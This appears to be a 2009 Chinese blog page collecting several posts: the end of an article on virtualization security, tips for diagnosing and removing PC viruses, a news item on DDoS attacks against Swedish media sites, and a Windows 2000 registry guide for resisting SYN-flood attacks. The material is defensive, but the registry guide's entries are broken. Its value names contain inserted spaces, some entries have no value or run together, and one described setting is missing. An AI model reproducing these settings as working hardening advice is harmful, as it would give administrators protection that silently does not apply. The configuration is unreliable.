　　保持所有相关活动的审计记录也是非常重要的。一个有关正在运行的情况的漫游快照能够让管理员回去进行验证、优化和监视用户活动，并且保持一个准确的快照。通过运行在同一个沙箱中的与遵守法规有关的应用程序，与其它更普通的应用程序隔离开，企业能够减少数据泄漏的风险。这允许企业保持一个适当的安全态势并且根据传统的数据分类按照政策隔离虚拟机。
　　
　　为了减少虚拟机蔓延，企业应该利用一些时间培训管理员有关虚拟基础设施开发、管理和安全的知识。他们要求明确地理解虚拟化技术和虚拟化技术与传统的IT基础设施的区别。IT人员必须有正确的工具进行有效的管理。但是，IT人员还需要进行培训以正确地管理这个新的基础设施。
　　
　　解除服务器虚拟化安全隐患之安全改进
　　
　　机构能够继续改善他们的安全态势。下面是一些额外的建议：
　　
　　?减少服务器关机时间。虚拟机能够在完全运行的时候进行备份，因此要确认你的系统在继续运行以保证实时备份。如果一个系统发生故障并且管理员执行了实时备份或定时快照，系统会很快恢复。如果恢复是必要的，那么，退回重来就像提取最新的快照一样简单。
　　
　　?改善IT效率。企业利用一个批准的黄金镜像能够实现增强的安全性和管理性。这个黄金镜像为一个桌面提供各种存储在防火墙后面的用户资料。这样做企业能够显著改善生产率，帮助改善IT运营。这种做法就是保证每一个使用的虚拟机都是根据经过批准的黄金镜像制作的，无论这些虚拟机用于开发、测试或者生产都是如此。
　　
　　?提高灵活性。为了向一切都是服务的模式的过渡，企业能够定义和应用合适的数据分类和分离。这还能够使企业更轻松和更自信地恰当地选择专有的和公共的云计算解决方案。这是因为虚拟化能够参考SOA让实施更方便地在云计算环境中管理和部署。
　　
　　随着虚拟化继续推动数据中心的发展，采用超越物理环境的最佳安全做法、政策和解决方案并且像对待物理环境一样警惕地对待虚拟环境是非常重要的。理解你的企业的安全风险状况，应用适当水平的安全措施能够让你的企业从虚拟解决方案中获得巨大的好处，同时为未来的数据中心技术创新创造一个舞台。
　　
　　如果您能做好以上五大策略，解除服务器虚拟化安全隐患工作就能够很好的执行了。

小技巧全面清除电脑病毒

568084439@qq.com(♀10點10分♂) — Tue, 03 Nov 2009 15:43:55 GMT

一、中毒的一些表现
　　
　　我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样，总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开，电脑不能正常启动、硬盘分区找不到了、数据丢失等等，就是中毒的一些征兆。
　　
　　二、中毒诊断
　　
　　1、按Ctrl+Shift+Ese键(同时按此三键)，调出windows任务管理器查看系统运行的进程，找出不熟悉进程并记下其名称(这需要经验)，如果这些进程是病毒的话，以便于后面的清除。暂时不要结束这些进程，因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态，如果CPU的利用率接近100%或内存的占用值居高不下，此时电脑中毒的可能性是95%。
　　
　　2、查看windows当前启动的服务项，由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言，正常的windows服务，基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外)，此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称，假如其名称和路径为C:\winnt\system32\explored.exe，计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边，中间有一纵向的滚动条，而右边为空白，再双击添加/删除程序或管理工具，窗体内是空的，这是病毒文件winhlpp32.exe发作的特性。
　　
　　3、运行注册表编辑器，命令为regedit或regedt32,查看都有那些程序与windows一起启动。主要看Hkey_Local_Machine\Software\MicroSoft\Windows\CurrentVersion\Run和后面几个RunOnce等，查看窗体右侧的项值，看是否有非法的启动项。WindowsXp运行msconfig也起相同的作用。随着经验的积累，你可以轻易的判断病毒的启动项。
　　
　　4、用浏览器上网判断。前一阵发作的Gaobot病毒，可以上yahoo.com,sony.com等网站，但是不能访问安全厂商的网站。
　　
　　5、取消隐藏属性，查看系统文件夹winnt(windows)\system32,如果打开后文件夹为空，表明电脑已经中毒;打开system32后，可以对图标按类型排序，看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks,wins,drivers.目前有的病毒执行文件就藏身于此;drivers\etc下的文件hosts是病毒喜欢篡改的对象，它本来只有700字节左右，被篡改后就成了1Kb以上，这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。
　　
　　6、由杀毒软件判断是否中毒，如果中毒，杀毒软件会被病毒程序自动终止，并且手动升级失败。
　　
　　三、灭毒
　　
　　1、在注册表里删除随系统启动的非法程序，然后在注册表中搜索所有该键值，删除之。当成系统服务启动的病毒程序，会在Hkey_Local_Machine\System\ControlSet001\services和controlset002\services里藏身，找到之后一并消灭。
　　
　　2、停止有问题的服务，改自动为禁止。
　　
　　3、如果文件system32\drivers\etc\hosts被篡改，恢复它，即只剩下一行有效值“127.0.0.1localhost”,其余的行删除。再把host设置成只读。
　　
　　4、重启电脑，摁F8进“带网络的安全模式”。目的是不让病毒程序启动，又可以对Windows升级打补丁和对杀毒软件升级。
　　
　　5、搜索病毒的执行文件，手动消灭之。
　　
　　6、对Windows升级打补丁和对杀毒软件升级。
　　
　　7、关闭不必要的系统服务，如remoteregistryservice。
　　
　　8、第6步完成后用杀毒软件对系统进行全面的扫描，剿灭漏网之鱼。
　　
　　9、上步完成后，重启计算机，完成所有操作。

瑞典40家大型媒体网站同时遭DDoS攻击

568084439@qq.com(♀10點10分♂) — Tue, 03 Nov 2009 15:40:31 GMT

瑞典正在调查一件攻击网站的大案，访问靠前的多个媒体公司的网站当地时间周四被全面DDoS攻击，随后，瑞典警方的网站也在几个小时后瘫痪。

　　警方表示，两波袭击事件有其关联性，因为攻击方法相同，攻击带宽的数目也几乎相同，攻击者源自亚洲。
　　据了解，针对一家名叫Adeprimo的媒体网站的请求最高时达到40万次/秒，而平常这一数字只有800，所有采用瑞典本土IT服务供应商Basefarm租用服务器空间的媒体公司都受到了影响。

教你通过修改注册表以增强系统安全

568084439@qq.com(♀10點10分♂) — Mon, 02 Nov 2009 04:09:53 GMT

防范DDOS攻击并不一定非要用防火墙。一部份DDOS我们可以通过DOS命令netstat -an　more或者网络综合分析软件：sniff等查到相关攻击手法、如攻击某个主要端口、或者对方主要来自哪个端口、对方IP等。这样我们可以利用w2k自带的远程访问与路由或者IP策略等本身自带的工具解决掉这些攻击。做为无法利用这些查到相关数据的我们也可以尝试一下通过对服务器进行安全设置来防范DDOS攻击。如果通过对服务器设置不能有效解决，那么就可以考虑购买抗DDOS防火墙了。其实从操作系统角度来说，本身就藏有很多的功能，只是很多是需要我们慢慢的去挖掘的。这里我给大家简单介绍一下如何在Win2000环境下通过修改注册表，增强系统的抗DoS能力。
　　
　　请注意，以下的安全设置均通过注册表进行修改，该设置的性能取决于服务器的配置，尤其是CPU的处理能力。如按照如下进行安全设置，采用双路至强2.4G的服务器配置，经过测试，可承受大约1万个包的攻击量。
　　
　　[HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Tcpip Parameters]
　　
　　关闭无效网关的检查。当服务器设置了多个网关，这样在网络不通畅的时候系统会尝试连接第二个网关，通过关闭它可以优化网络。
　　
　　"Enable Dead GW Detect"=dword:00000000
　　
　　禁止响应ICMP重定向报文。此类报文有可能用以攻击，所以系统应该拒绝接受ICMP重定向报文。
　　
　　"Enable ICMP Redirects"=dword:00000000
　　
　　不允许释放NETBIOS名。当攻击者发出查询服务器NETBIOS名的请求时，可以使服务器禁止响应。注意系统必须安装SP2以上。
　　
　　"Noname Release On Demand"=dword:00000001
　　
　　发送验证保持活动数据包。该选项决定TCP间隔多少时间来确定当前连接还处于连接状态，不设该值，则系统每隔2小时对TCP是否有闲置连接进行检查，这里设置时间为5分钟。
　　
　　"Keep Alive Time"=dword:000493e0
　　
　　禁止进行最大包长度路径检测。该项值为1时，将自动检测出可以传输的数据包的大小，可以用来提高传输效率，如出现故障或安全起见，设项值为0，表示使用固定MTU值576bytes。
　　
　　"Enable PMTU Discovery"=dword:00000000
　　
　　启动syn攻击保护。缺省项值为0，表示不开启攻击保护，项值为1和2表示启动syn攻击保护，设成2之后安全级别更高，对何种状况下认为是攻击，则需要根据下面的TcpMaxHalfOpen和cpMaxHalfOpenRetried值设定的条件来触发启动了。这里需要注意的是，NT4.0必须设为1，设为2后在某种特殊数据包下会导致系统重启。
　　
　　"Syn Attack Protect"=dword:00000002
　　
　　同时允许打开的半连接数量。所谓半连接，表示未完整建立的TCP会话，用netstat命令可以看到呈SYN_RCVD状态的就是。这里使用微软建议值，服务器设为100，高级服务器设为500。建议可以设稍微小一点。
　　
　　"Tcp Max HalfOpen"=dword:00000064
　　
　　判断是否存在攻击的触发点。这里使用微软建议值，服务器为80，高级服务器为400。
　　
　　"Tcp Max HalfOpen Retried"=dword:00000050
　　
　　设置等待SYN-ACK时间。缺省项值为3，缺省这一过程消耗时间45秒。项值为2，消耗时间为21秒。 BBS.bitsCN.com网管论坛项值为1，消耗时间为9秒。最低可以设为0，表示不等待，消耗时间为3秒。这个值可以根据遭受攻击规模修改。微软站点安全推荐为2。
　　
　　设置TCP重传单个数据段的次数。缺省项值为5，缺省这一过程消耗时间240秒。微软站点安全推荐为3。
　　
　　"Tcp Max Data Retransmissions"=dword:00000003
　　
　　设置syn攻击保护的临界点。当可用的backlog变为0时，此参数用于控制syn攻击保护的开启，微软站点安全推荐为5。
　　
　　"TCP Max Ports Exhausted"=dword:00000005
　　
　　禁止IP源路由。缺省项值为1，表示不转发源路由包，项值设为0，表示全部转发，设置为2，表示丢弃所有接受的
　　源路由包，微软站点安全推荐为2。
　　
　　"Disable IP Source Routing"=dword:0000002
　　
　　限制处于TIME_WAIT状态的最长时间。缺省为240秒，最低为30秒，最高为300秒。建议设为30秒。
　　
　　"Tcp Timed Wait Delay"=dword:0000001e
　　
　　[HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Net BT Parameters]
　　
　　增大NetBT的连接块增加幅度。缺省为3，范围1-20，数值越大在连接越多时提升性能。每个连接块消耗87个字节。
　　
　　"BacklogIncrement"=dword:00000003
　　
　　最大NetBT的连接快的数目。范围1-40000，这里设置为1000，数值越大在连接越多时允许更多连接。
　　
　　"Max Conn Back Log"=dword:000003e8
　　
　　[HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Afd Parameters]
　　
　　配置激活动态Backlog。对于网络繁忙或者易遭受SYN攻击的系统，建议设置为1，表示允许动态cklog。
　　
　　"Enable Dynamic Backlog"=dword:00000001
　　
　　配置最小动态Backlog。默认项值为0，表示动态Backlog分配的自由连接的最小数目。当自由连接数目
　　低于此数目时，将自动的分配自由连接。默认值为0，对于网络繁忙或者易遭受SYN攻击的系统，建议设置为20。
　　
　　"Minimum Dynamic Backlog"=dword:00000014
　　
　　最大动态Backlog。表示定义最大"准"连接的数目，主要看内存大小，理论每32M内存最大可以
　　增加5000个，这里设为20000。 BBS.bitsCN.com网管论坛
　　
　　"Maximum Dynamic Backlog"=dword:00002e20
　　
　　每次增加的自由连接数据。默认项值为5，表示定义每次增加的自由连接数目。对于网络繁忙或者易遭受SYN攻击的系统，建议设置为10。
　　
　　"Dynamic Backlog Growth Delta"=dword:0000000a
　　
　　以下部分需要根据实际情况手动修改
　　
　　[HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Tcpip Parameters]
　　
　　启用网卡上的安全过滤
　　
　　"Enable Security Filters"=dword:00000001同时打开的TCP连接数，这里可以根据情况进行控制。
　　
　　"Tcp Num Connections"=该参数控制 TCP 报头表的大小限制。在有大量 RAM 的机器上，增加该设置可以提高 SYN 攻击期间的响应性能。
　　
　　"Tcp Max Send Free"[HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Tcpip Parameters Interfaces]
　　
　　禁止路由发现功能。ICMP路由通告报文可以被用来增加路由表纪录，可以导致攻击，所以禁止路由发现。